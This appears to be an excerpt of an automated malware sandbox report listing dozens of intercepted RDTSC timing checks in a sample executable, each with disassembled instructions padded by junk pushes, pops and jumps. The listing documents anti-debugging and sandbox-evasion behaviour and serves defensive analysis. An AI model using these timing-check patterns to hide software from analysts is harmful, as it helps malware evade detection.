Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB06BA second address: FB06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB06C0 second address: FB06C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB07E4 second address: FB07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB07E8 second address: FB080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB18h 0x00000007 jl 00007FF34080AB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB080F second address: FB0849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810306h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF340810300h 0x00000012 pop eax 0x00000013 popad 0x00000014 js 00007FF340810318h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB09BE second address: FB09CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FF34080AB06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB0B1A second address: FB0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB97B6 second address: FB97D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b jc 00007FF34080AB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB776E second address: FB7779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF3408102F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7779 second address: FB77B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF34080AB06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FF34080AB35h 0x00000015 jnc 00007FF34080AB0Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF34080AB11h 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB78D7 second address: FB78E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB78E8 second address: FB78EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7A65 second address: FB7A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FF3408102FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF340810304h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7A90 second address: FB7A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7A94 second address: FB7AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810304h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jne 00007FF3408102FCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7DBC second address: FB7DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7DD4 second address: FB7DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB86D5 second address: FB86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB8A06 second address: FB8A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB8A0C second address: FB8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF34080AB08h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB8A1C second address: FB8A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF340810301h 0x0000000c jmp 00007FF3408102FFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB91E6 second address: FB91EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB91EC second address: FB91F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB91F2 second address: FB9205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF34080AB0Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB9205 second address: FB9215 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB94E9 second address: FB9505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF34080AB14h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB9505 second address: FB9512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB9512 second address: FB952B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB14h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC2534 second address: FC255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF340810304h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 je 00007FF3408102F6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F1411E second address: F14124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC173A second address: FC173E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC173E second address: FC1749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC1BCF second address: FC1BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC1BDE second address: FC1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC1EF4 second address: FC1F13 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF3408102FBh 0x0000000f jnp 00007FF3408102F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC20B9 second address: FC20BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC20BD second address: FC20C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC20C1 second address: FC20EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FF34080AB06h 0x00000016 jmp 00007FF34080AB18h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC20EF second address: FC20F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC868E second address: FC8692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC8C77 second address: FC8C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF3408102FCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC8DD0 second address: FC8DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC8DD4 second address: FC8DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810306h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC90B3 second address: FC90B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC9BF0 second address: FC9BFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC9BFA second address: FC9C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF34080AB0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC9C0C second address: FC9C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD15C8 second address: FD15D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD15D3 second address: FD15DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD173A second address: FD1744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD1744 second address: FD1748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD1748 second address: FD1754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FDD911 second address: FDD915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FDDA7D second address: FDDA9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB0Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FDDA9F second address: FDDAAB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FDDAAB second address: FDDAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF9FEB second address: FFA006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF340810303h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FFA006 second address: FFA019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jng 00007FF34080AB06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FFA019 second address: FFA03A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FF3408102F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF340810301h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF8C6C second address: FF8C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF8DB0 second address: FF8DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF8DB6 second address: FF8DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF8DBA second address: FF8DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF9249 second address: FF9286 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FF34080AB0Eh 0x0000000f jmp 00007FF34080AB15h 0x00000014 popad 0x00000015 push edx 0x00000016 jmp 00007FF34080AB0Bh 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF93AC second address: FF93D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF3408102F6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007FF3408102FCh 0x00000012 jno 00007FF3408102FAh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF93D3 second address: FF93D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FFF333 second address: FFF342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FFEF28 second address: FFEF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 1009598 second address: 100959D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100959D second address: 10095C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 push ecx 0x00000008 jng 00007FF34080AB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100E707 second address: 100E70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100E70B second address: 100E711 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100E711 second address: 100E758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF340810309h 0x0000000b js 00007FF340810332h 0x00000011 push esi 0x00000012 jmp 00007FF340810302h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF3408102FAh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 100E758 second address: 100E75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 1010C5A second address: 1010C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 10229B4 second address: 10229B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 10229B8 second address: 10229CC instructions: 0x00000000 rdtsc 0x00000002 je 00007FF3408102F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FF3408102F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103BC90 second address: 103BC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103BC94 second address: 103BC9E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103BC9E second address: 103BCD3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF34080AB11h 0x00000015 popad 0x00000016 push esi 0x00000017 jmp 00007FF34080AB0Dh 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103AE32 second address: 103AE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103AE3A second address: 103AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103AFA7 second address: 103AFC1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF340810305h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B396 second address: 103B3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB11h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jnp 00007FF34080AB06h 0x00000011 jmp 00007FF34080AB19h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B525 second address: 103B538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jne 00007FF3408102F6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B538 second address: 103B553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB17h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B553 second address: 103B55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B55F second address: 103B56F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FF34080AB0Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B817 second address: 103B81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B81F second address: 103B823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B823 second address: 103B829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B829 second address: 103B852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF34080AB11h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF34080AB0Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B852 second address: 103B857 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B857 second address: 103B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FF34080AB06h 0x00000011 rdtsc
